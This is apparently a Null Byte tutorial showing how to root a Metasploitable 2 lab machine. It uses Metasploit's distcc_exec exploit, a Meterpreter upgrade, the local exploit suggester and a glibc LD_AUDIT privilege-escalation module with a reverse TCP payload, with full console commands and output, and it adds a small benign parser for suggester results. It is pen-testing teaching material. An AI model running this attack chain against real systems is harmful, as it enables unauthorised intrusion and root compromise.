
How to Get Root with Metasploit's Local Exploit Suggester « Null Byte :: WonderHowTo



So you managed to get a shell on the target, but you only have measly low privileges. What now? Privilege escalation is a huge field and can be one of the most rewarding but frustrating stages of an attack. We could follow the manual route, but, as always, Metasploit makes it easy to perform local privilege escalation and get root with the local exploit suggester module.

To go through the process, we use Kali Linux as the attacking machine and Metasploitable 2 as the target. You can set up or use a similar pen-testing lab, or the same one, to follow along with the guide below.

Step 1: Get a Session on the Target

The first thing to do is get a low-privilege session on the target. We can easily do this with Metasploit. Type msfconsole in the terminal to start it.

  ~$ msfconsole

  [-] Starting the Metasploit Framework console...
  [-] * WARNING: No database support: No database YAML file
  [-] ***


         =[ metasploit v5.0.20-dev                          ]
  + -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
  + -- --=[ 546 payloads - 44 encoders - 10 nops            ]
  + -- --=[ 2 evasion                                       ]

  msf5 >

Metasploitable contains a vulnerable service called distccd, which is used to distribute program compilation across multiple systems, speeding things up by pooling processor power. Unfortunately, this version of the program lets a remote attacker execute arbitrary commands on the server.

We can search for the exploit with the search command:

  msf5 > search distcc

  Matching Modules
  ================

     #  Name                           Disclosure Date  Rank       Check  Description
     -  ----                           ---------------  ----       -----  -----------
     0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

To load the module, type use followed by the full path of the module:

  msf5 > use exploit/unix/misc/distcc_exec

We can now see the available settings with the options command:

  msf5 exploit(unix/misc/distcc_exec) > options

  Module options (exploit/unix/misc/distcc_exec):

     Name    Current Setting  Required  Description
     ----    ---------------  --------  -----------
     RHOSTS                   yes       The target address range or CIDR identifier
     RPORT   3632             yes       The target port (TCP)

  Exploit target:

     Id  Name
     --  ----
     0   Automatic Target

It looks like we only need to set the remote host address, since the remote port is already set to the service's default port number. Use the set command to specify the target's IP address:

  msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50

  rhosts => 10.10.0.50

Now we are ready to launch the exploit. Use the run command, which is just a shorter alias for exploit:

  msf5 exploit(unix/misc/distcc_exec) > run

  [*] Started reverse TCP double handler on 10.10.0.1:4444
  [*] Accepted the first client connection...
  [*] Accepted the second client connection...
  [*] Command: echo sWI9yfQYbPxuIGrh;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets...
  [*] Reading from socket B
  [*] B: "sWI9yfQYbPxuIGrh\r\n"
  [*] Matching...
  [*] A is input...
  [*] Command shell session 1 opened (10.10.0.1:4444 -> 10.10.0.50:58006) at 2019-11-19 11:46:02 -0500

  uname -a
  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

We can see that a command shell has been opened, and running uname -a verifies that we have compromised the target.

Step 2: Upgrade to Meterpreter

To use Metasploit's local exploit suggester, we must upgrade our plain Unix command shell to a Meterpreter session. While still in the basic command shell, press Ctrl-Z to background the session. Press Y if you are asked whether to background it.

  Background session 1? [y/N]  y
  msf5 exploit(unix/misc/distcc_exec) >

We have now dropped back to the main Metasploit prompt, and we can view all the sessions running in the background with the sessions command:

  msf5 exploit(unix/misc/distcc_exec) > sessions

  Active sessions
  ===============

    Id  Name  Type            Information  Connection
    --  ----  ----            -----------  ----------
    1         shell cmd/unix               10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)

The easiest way to upgrade a regular shell to a Meterpreter session is to use the -u flag followed by the number of the session to upgrade:

  msf5 exploit(unix/misc/distcc_exec) > sessions -u 1

  [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

  [*] Upgrading session ID: 1
  [*] Starting exploit/multi/handler
  [*] Started reverse TCP handler on 10.10.0.1:4433
  [*] Sending stage (985320 bytes) to 10.10.0.50
  [*] Meterpreter session 2 opened (10.10.0.1:4433 -> 10.10.0.50:32979) at 2019-06-19 11:47:52 -0500
  [*] Command stager progress: 100.00% (773/773 bytes)

We can see the post module being executed and a new session being opened. We can verify this again with the sessions command:

  msf5 exploit(unix/misc/distcc_exec) > sessions

  Active sessions
  ===============

    Id  Name  Type                   Information                                                Connection
    --  ----  ----                   -----------                                                ----------
    1         shell cmd/unix                                                                    10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
    2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)

And we can interact with our new Meterpreter session by using the -i flag on the desired session:

  msf5 exploit(unix/misc/distcc_exec) > sessions -i 2

  [*] Starting interaction with 2...

  meterpreter >

Step 3: Run the Exploit Suggester

Metasploit post modules work by running against a backgrounded session, not directly inside the session itself, so background session 2 (our Meterpreter shell) and return to the main prompt. We can then load the local exploit suggester with the following command:

  msf5 exploit(unix/misc/distcc_exec) > use post/multi/recon/local_exploit_suggester

If we look at the options, we only need to specify the session we want to run this against:

  msf5 post(multi/recon/local_exploit_suggester) > options

  Module options (post/multi/recon/local_exploit_suggester):

     Name             Current Setting  Required  Description
     ----             ---------------  --------  -----------
     SESSION                           yes       The session to run this module on
     SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

Simply set the session to number 2, which is our Meterpreter shell:

  msf5 post(multi/recon/local_exploit_suggester) > set session 2

  session => 2

And type run to kick it off:

  msf5 post(multi/recon/local_exploit_suggester) > run

  [*] 10.10.0.50 - Collecting local exploits for x86/linux...
  [*] 10.10.0.50 - 26 exploit checks are being attempted...
  [+] 10.10.0.50 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
  [+] 10.10.0.50 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
  [+] 10.10.0.50 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
  [*] Post module execution completed

We can see that the module runs a number of local exploit checks and returns several that appear viable. Note that "appears to be vulnerable" is the result of a version or configuration check, not a confirmed exploitation, so each candidate still has to be tried. Awesome.
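As an added example (not part of the original tutorial), here is a small Python parser for the suggester's console output. It turns the [*] and [+] lines into a per-host summary, which is handy when the module has been run across several sessions in an engagement and you need a record of which hosts flagged which local exploits, and therefore which hosts still need patching. The sample output is constructed from the Step 3 transcript above plus a second, hypothetical host with no findings.

```python
import re
from dataclasses import dataclass, field

# Patterns for the three line types the suggester prints (format as in the transcript above).
_ARCH_RE = re.compile(r"^\[\*\]\s+(?P<host>\S+)\s+-\s+Collecting local exploits for (?P<arch>[^\s.]+)")
_CHECKS_RE = re.compile(r"^\[\*\]\s+(?P<host>\S+)\s+-\s+(?P<n>\d+)\s+exploit checks are being attempted")
_VULN_RE = re.compile(r"^\[\+\]\s+(?P<host>\S+)\s+-\s+(?P<module>[^\s:]+):\s+The target appears to be vulnerable")

@dataclass
class SuggesterResult:
    host: str
    arch: str = ""
    checks_attempted: int = 0
    candidates: list = field(default_factory=list)  # flagged modules, in the order reported

def parse_suggester_output(text):
    """Return {host: SuggesterResult} built from msfconsole output of local_exploit_suggester."""
    results = {}
    for raw in text.splitlines():
        line = raw.strip()
        if m := _ARCH_RE.match(line):
            results.setdefault(m["host"], SuggesterResult(m["host"])).arch = m["arch"]
        elif m := _CHECKS_RE.match(line):
            results.setdefault(m["host"], SuggesterResult(m["host"])).checks_attempted = int(m["n"])
        elif m := _VULN_RE.match(line):
            r = results.setdefault(m["host"], SuggesterResult(m["host"]))
            if m["module"] not in r.candidates:  # list each module once even if the line repeats
                r.candidates.append(m["module"])
    return results

def summarize(results):
    """One line per host: how many of the attempted checks flagged the host."""
    return [f"{r.host} ({r.arch}): {len(r.candidates)}/{r.checks_attempted} checks flagged"
            for r in results.values()]

# Constructed sample: the lines from Step 3 above, plus a hypothetical second host with no findings.
SAMPLE_OUTPUT = """
[*] 10.10.0.50 - Collecting local exploits for x86/linux...
[*] 10.10.0.50 - 26 exploit checks are being attempted...
[+] 10.10.0.50 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[*] Post module execution completed
[*] 10.10.0.51 - Collecting local exploits for x86/linux...
[*] 10.10.0.51 - 26 exploit checks are being attempted...
[*] Post module execution completed
"""

if __name__ == "__main__":
    for line in summarize(parse_suggester_output(SAMPLE_OUTPUT)):
        print(line)
```

Paste the real console output into SAMPLE_OUTPUT (or read it from a file) to get the same summary for your own sessions.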

Step 4: Get Root

The last thing we need to do is use one of these exploits to get root on the system. We will try the first one suggested to us. This exploit takes advantage of a vulnerability in glibc's dynamic loader, where the LD_AUDIT environment variable can be used to load a shared object into a setuid program, which then runs with root privileges.

  msf5 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc

Looking at the options, we only need to set the session again; the default SUID executable path works for now:

  msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options

  Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):

     Name             Current Setting  Required  Description
     ----             ---------------  --------  -----------
     SESSION                           yes       The session to run this module on.
     SUID_EXECUTABLE  /bin/ping        yes       Path to a SUID executable

  Exploit target:

     Id  Name
     --  ----
     0   Automatic

Set the session as before:

  msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 2

  session => 2

We can also set the payload so that we get another Meterpreter session once the exploit completes:

  msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp

  payload => linux/x86/meterpreter/reverse_tcp

And set the correct listening host (the IP address of our local machine) and port:

  msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 10.10.0.1

  lhost => 10.10.0.1

  msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 4321

  lport => 4321

Finally, type run to launch the exploit:

  msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

  [*] Started reverse TCP handler on 10.10.0.1:4321
  [+] The target appears to be vulnerable
  [*] Using target: Linux x86
  [*] Writing '/tmp/.BlrZu4n' (1271 bytes) ...
  [*] Writing '/tmp/.18qZUt' (281 bytes) ...
  [*] Writing '/tmp/.DoiFwlxPt' (207 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (985320 bytes) to 10.10.0.50
  [*] Meterpreter session 3 opened (10.10.0.1:4321 -> 10.10.0.50:56950) at 2019-11-19 11:57:19 -0500

  meterpreter >

We now have a new Meterpreter session on the target, and we can drop into a shell to check whether we have obtained root access:

  meterpreter > shell
  Process 4886 created.
  Channel 1 created.
  id
  uid=0(root) gid=0(root) groups=1(daemon)
  uname -a
  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Wrapping Up

In this tutorial, we learned how to use Metasploit to get a shell on the target, upgrade that shell to a Meterpreter session, and use the local exploit suggester module to eventually become root on the system. Metasploit makes not only the initial exploitation simple, but the post-exploitation phase as well. In the next article, we will explore some useful post modules for quickly collecting information about the target.

Cover image by Pixabay/Pexels; screenshots by drd_/Null Byte
